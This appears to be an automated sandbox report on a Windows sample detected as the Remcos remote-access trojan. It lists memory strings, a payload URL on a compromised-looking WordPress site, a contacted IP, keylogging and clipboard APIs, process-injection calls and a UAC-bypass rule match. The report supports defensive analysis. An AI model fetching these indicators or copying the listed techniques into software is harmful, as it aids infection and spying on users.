Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 1m181Ru74o.exe, 00000000.00000002.1424747239.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mJ
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: SndVol.exe, colorcpl.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: SndVol.exe, 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: 1m181Ru74o.exe, 00000000.00000002.1424747239.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: 1m181Ru74o.exe, 1m181Ru74o.exe, 00000000.00000003.1296854371.000000000290C000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1460211820.000000007FA30000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1297153626.000000007F8EF000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1425970905.0000000002908000.00000004.00000020.00020000.00000000.sdmp, Ntmftfld.PIF, 0000000B.00000002.1550969058.0000000002FB2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com
Source: 1m181Ru74o.exe, 00000000.00000002.1424747239.000000000060E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aarzoomarine.com/owa
Source: 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014DEC000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1424747239.000000000060E000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aarzoomarine.com/wp-content/plugins/231_Ntmftfldhfc
Source: 1m181Ru74o.exe, 00000000.00000002.1424747239.0000000000684000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aarzoomarine.com:443/wp-content/plugins/231_Ntmftfldhfc
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 103.101.59.23:443 -> 192.168.2.11:49706 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_00409340 SetWindowsHookExA 0000000D,0040932C,00000000

9_2_00409340

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,

9_2_0040A65A

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	9_2_00414EC1
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048F5C59 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	9_2_048F5C59
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	13_2_00414EC1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D45C59 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	13_2_06D45C59

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,

9_2_0040A65A

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

9_2_00409468

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000003.1544682057.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3762154701.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1616189351.000000000305C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3777713099.0000000025A3F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1616135041.000000000302F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1616096302.0000000003062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.1544796115.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3762154701.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 7944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4540, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0041A76C SystemParametersInfoW,	9_2_0041A76C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048FB504 SystemParametersInfoW,	9_2_048FB504
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0041A76C SystemParametersInfoW,	13_2_0041A76C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D4B504 SystemParametersInfoW,	13_2_06D4B504

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: Process Memory Space: SndVol.exe PID: 7944, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 5288, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 4540, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Source: C:\Windows\SysWOW64\SndVol.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02ECB11C GetModuleHandleW,NtOpenProcess,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx,	0_2_02ECB11C
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EC7A3C NtAllocateVirtualMemory,	0_2_02EC7A3C
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02ECDC90 RtlD,NtCreateFile,NtWriteFile,NtClose,	0_2_02ECDC90
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02ECDC08 RtlInitUnicodeString,RtlD,NtDeleteFile,	0_2_02ECDC08
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EC7D88 NtWriteVirtualMemory,	0_2_02EC7D88
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02ECDD74 RtlD,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_02ECDD74
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EC84D8 NtProtectVirtualMemory,	0_2_02EC84D8
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EC7A3A NtAllocateVirtualMemory,	0_2_02EC7A3A
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02ECDBB4 RtlInitUnicodeString,RtlD,NtDeleteFile,	0_2_02ECDBB4
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EC8D74 GetThreadContext,SetThreadContext,NtResumeThread,	0_2_02EC8D74
